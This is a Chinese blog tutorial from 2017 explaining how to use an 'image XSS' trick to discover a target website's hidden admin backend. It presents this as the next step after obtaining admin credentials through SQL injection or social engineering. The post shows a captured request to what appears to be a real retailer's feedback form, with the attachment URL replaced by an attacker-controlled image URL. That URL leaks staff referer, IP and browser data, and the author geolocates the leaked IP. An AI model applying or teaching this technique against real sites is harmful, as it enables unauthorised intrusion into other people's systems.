A-A+

图片XSS 获取对方后台 使用讲解

2017年04月01日 10:50 学习笔记 评论 2 条 阅读 386 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

 

有朋友问我XSS 平台图片XSS的使用方式,这里我做了一个详细的使用方法教程吧。最后说一下就是把所有你看到的数据包里的所有图片URL地址都替换成平台给你的URL地址就可以了注意编码格式也一定要对应,就这么简单。

※若使用图片XSS,在模块配置选项里,必须勾选‘默认模块’。如果不勾选,图片XSS无法获取数据

 

在讲这个案例前先说两个问题吧,不知道大家遇到过没有。

问题一:你是否遇到过通过SQL注入拿到了对方网址的管理账号和密码,但是各种方式用遍了就是找不到后台地址。无法进一步提权?(例如:dedecms 或者 yii2.0 等等)

问题二:你是否通过社工拿到了管理员的账号和密码,但是对方网站无任何问题,还是各种找不到后台地址,无法进一步工作?

今天这里大概讲一下这种问题应该如何用另类的XSS方法搞定它。

首先看下图,这个地方没有任何问题,但是注意这里面有一个上传图片的点(我已经把需要填写信息的地方都填写好啦)

 

找到信息提交点

因为这个网站没有任何问题,但是呢我还想拿这个网站的后台地址,应该如何操作呢?切看我如果施展神通。 注意这里,我们点击提交的同时数据抓包。

数据抓包

这里呢,我把数据包贡献出来。。

GET /sfp/questionnaire/reportVSSUrl.htm?content=%E5%9C%A8%E4%BD%A0%E5%AE%B6%E6%A0%B9%E6%9C%AC%E4%B9%B0%E4%B8%8D%E5%88%B0%E5%8D%8E%E4%B8%BAP10+plus+%E5%A4%A7%E9%AA%97%E5%AD%90%EF%BC%8C%E9%83%BD%E4%B9%B0%E5%A4%9A%E5%B0%91%E5%A4%A9%E4%BA%86%E9%83%BD%E3%80%82%E3%80%82%E3%80%82&file=&contact=15555515555&attachment=https%3A%2F%2Fimage.suning.cn%2Fuimg%2Fsfp%2Fad%2F149101321731415393.jpg HTTP/1.1

 

我们解码一下:

/sfp/questionnaire/reportVSSUrl.htm?content=在你家根本买不到华为P10 plus 大骗子,都买多少天了都。。。&file=&contact=15555515555&attachment=https://image.suning.cn/uimg/sfp/ad/149101321731415393.jpg HTTP/1.1

 

这里似乎很明确,跟我提交的信息都一样,而大家注意到了么https://image.suning.cn/uimg/sfp/ad/149101321731415393.jpg 这个URL地址,这个就应该是我上传的图片的地址。

我们来访问一下,看一看是不是刚才咱们上传的图片。

上传的图片

很明显了对么,,,这里大家就要注意了,我们拿出我们的大杀器。。。 XSS 平台提供的URL地址。【一会我会说这个原理】

XSS平台提供的图片XSS地址

大家看到了么,XSS平台提供了一个图片地址。  http://xxxx.xx/xxxx/test.jpg

我们只需要把上面的URL地址替换成XSS平台提供的地址。。。

GET /sfp/questionnaire/reportVSSUrl.htm?content=在你家根本买不到华为P10 plus 大骗子,都买多少天了都。。。&file=&contact=15555515555&attachment=http://xxx.txp/jxx1/test.jpg HTTP/1.1

大家看到了吧,我已经替换了,然后我们在编码一下。。

大家注意我图中黄色背景的部分就是咱们替换后的部分。。

更改数据包替换图片地址

好了。剩下的就简单了。 我们直接放行这个数据包。。。。然后坐等XSS平台收货吧。。

最后发出一张收货的图片。

xss平台收到信息

通过 IP查询一下精确地址

ip地址位置精确定位到总部

最后说一下这个图片获取对方地址的技术,其实很简单,就是利用PHP伪造了一个图片,通过这个PHP来获取URL来路和IP还有浏览器而已。。。

标签:

2 条留言  访客:2 条  博主:0 条

  1. Chou ke

    学习了

  2. cs1.6

    求xss平台地址.感觉蛮给力

给我留言